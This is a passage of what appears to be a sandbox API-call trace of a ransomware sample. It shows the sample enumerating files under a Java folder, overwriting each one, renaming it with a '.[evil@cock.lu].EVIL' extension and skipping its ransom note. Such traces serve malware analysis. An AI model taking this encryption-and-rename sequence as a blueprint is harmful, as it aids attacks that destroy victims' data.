(_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.333] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\..") returned 49 [0097.333] wcscmp (_String1=".", _String2="..") returned -1 [0097.333] wcscmp (_String1="..", _String2="..") returned 0 [0097.333] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.333] wcsstr (_Str="cursors", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.333] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors") returned 54 [0097.333] wcscmp (_String1=".", _String2="cursors") returned -1 [0097.333] wcscmp (_String1="..", _String2="cursors") returned -1 [0097.333] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors") returned 0x36 [0097.333] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors") returned 0x0 [0097.333] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\*" [0097.333] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd080 [0097.334] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.334] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\.") returned 56 [0097.334] wcscmp (_String1=".", _String2=".") returned 0 [0097.334] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.334] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.334] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\..") returned 57 [0097.334] wcscmp (_String1=".", _String2="..") returned -1 [0097.334] wcscmp (_String1="..", _String2="..") returned 0 [0097.334] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.334] wcsstr (_Str="cursors.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.334] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties") returned 73 [0097.334] wcscmp (_String1="cursors.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.334] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="cursors.properties") returned 0x0 [0097.335] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties") returned 0x49 [0097.335] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.337] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd280*=0x500, lpOverlapped=0x0) returned 1 [0097.339] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.339] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.339] _errno () returned 0x84b1160840 [0097.339] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.339] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd280*=0x520, lpOverlapped=0x0) returned 1 [0097.340] CloseHandle (hObject=0x1ac) returned 1 [0097.340] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.340] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.340] __uncaught_exception () returned 0x84b1160800 [0097.340] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.340] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties.[evil@cock.lu].evil")) returned 1 [0097.341] ??_V@YAXPEAX@Z () returned 0x1 [0097.344] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties", dwFileAttributes=0x0) returned 0 [0097.344] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.344] wcsstr (_Str="invalid32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.344] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif") returned 71 [0097.344] wcscmp (_String1="invalid32x32.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.344] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="invalid32x32.gif") returned 0x0 [0097.344] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif") returned 0x47 [0097.344] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.347] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd280*=0x99, lpOverlapped=0x0) returned 1 [0097.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.350] _errno () returned 0x84b1160840 [0097.350] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.350] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xa0, lpOverlapped=0x0) returned 1 [0097.350] CloseHandle (hObject=0x1ac) returned 1 [0097.350] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.350] __uncaught_exception () returned 0x84b1160800 [0097.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.424] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.425] ??_V@YAXPEAX@Z () returned 0x1 [0097.428] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif", dwFileAttributes=0x0) returned 0 [0097.428] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.428] wcsstr (_Str="win32_CopyDrop32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.428] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 78 [0097.428] wcscmp (_String1="win32_CopyDrop32x32.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.428] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="win32_CopyDrop32x32.gif") returned 0x0 [0097.428] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 0x4e [0097.428] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.430] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd280*=0xa5, lpOverlapped=0x0) returned 1 [0097.432] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.432] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.432] _errno () returned 0x84b1160840 [0097.433] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.433] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xc0, lpOverlapped=0x0) returned 1 [0097.433] CloseHandle (hObject=0x1ac) returned 1 [0097.433] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.433] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.433] __uncaught_exception () returned 0x84b1160800 [0097.433] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.466] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_copydrop32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_copydrop32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.467] ??_V@YAXPEAX@Z () returned 0x1 [0097.469] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif", dwFileAttributes=0x0) returned 0 [0097.469] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.469] wcsstr (_Str="win32_CopyNoDrop32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.470] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 80 [0097.470] wcscmp (_String1="win32_CopyNoDrop32x32.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.470] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="win32_CopyNoDrop32x32.gif") returned 0x0 [0097.470] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 0x50 [0097.470] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.473] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd280*=0x99, lpOverlapped=0x0) returned 1 [0097.475] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.475] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.475] _errno () returned 0x84b1160840 [0097.475] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.475] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xa0, lpOverlapped=0x0) returned 1 [0097.475] CloseHandle (hObject=0x1ac) returned 1 [0097.475] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.475] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.475] __uncaught_exception () returned 0x84b1160800 [0097.475] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.477] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_copynodrop32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.477] ??_V@YAXPEAX@Z () returned 0x1 [0097.481] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif", dwFileAttributes=0x0) returned 0 [0097.482] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.482] wcsstr (_Str="win32_LinkDrop32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.482] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 78 [0097.482] wcscmp (_String1="win32_LinkDrop32x32.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.482] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="win32_LinkDrop32x32.gif") returned 0x0 [0097.482] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 0x4e [0097.482] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.484] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd280*=0xa8, lpOverlapped=0x0) returned 1 [0097.487] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.487] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.487] _errno () returned 0x84b1160840 [0097.488] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.488] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xc0, lpOverlapped=0x0) returned 1 [0097.488] CloseHandle (hObject=0x1ac) returned 1 [0097.488] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.488] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.488] __uncaught_exception () returned 0x84b1160800 [0097.488] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.516] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_linkdrop32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.517] ??_V@YAXPEAX@Z () returned 0x1 [0097.520] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif", dwFileAttributes=0x0) returned 0 [0097.520] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.520] wcsstr (_Str="win32_LinkNoDrop32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.520] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 80 [0097.520] wcscmp (_String1="win32_LinkNoDrop32x32.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.520] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="win32_LinkNoDrop32x32.gif") returned 0x0 [0097.520] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 0x50 [0097.520] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.522] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd280*=0x99, lpOverlapped=0x0) returned 1 [0097.527] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.527] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.527] _errno () returned 0x84b1160840 [0097.527] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.527] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xa0, lpOverlapped=0x0) returned 1 [0097.528] CloseHandle (hObject=0x1ac) returned 1 [0097.528] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.528] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.528] __uncaught_exception () returned 0x84b1160800 [0097.528] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.549] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_linknodrop32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.550] ??_V@YAXPEAX@Z () returned 0x1 [0097.553] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif", dwFileAttributes=0x0) returned 0 [0097.553] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.553] wcsstr (_Str="win32_MoveDrop32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.553] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 78 [0097.553] wcscmp (_String1="win32_MoveDrop32x32.gif", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.553] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="win32_MoveDrop32x32.gif") returned 0x0 [0097.553] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 0x4e [0097.553] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.568] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd280*=0x93, lpOverlapped=0x0) returned 1 [0097.571] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.571] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.571] _errno () returned 0x84b1160840 [0097.571] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.571] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xa0, lpOverlapped=0x0) returned 1 [0097.571] CloseHandle (hObject=0x1ac) returned 1 [0097.571] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.571] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.571] __uncaught_exception () returned 0x84b1160800 [0097.571] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.572] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_movedrop32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_movedrop32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.573] ??_V@YAXPEAX@Z () returned 0x1 [0097.576] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif", dwFileAttributes=0x0) returned 0 [0097.576] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0097.576] wcsstr (_Str="win32_MoveNoDrop32x32.gif", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.576] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 80 [0097.576] wcscmp (_String1="win32_MoveNoDrop32x32.gif", 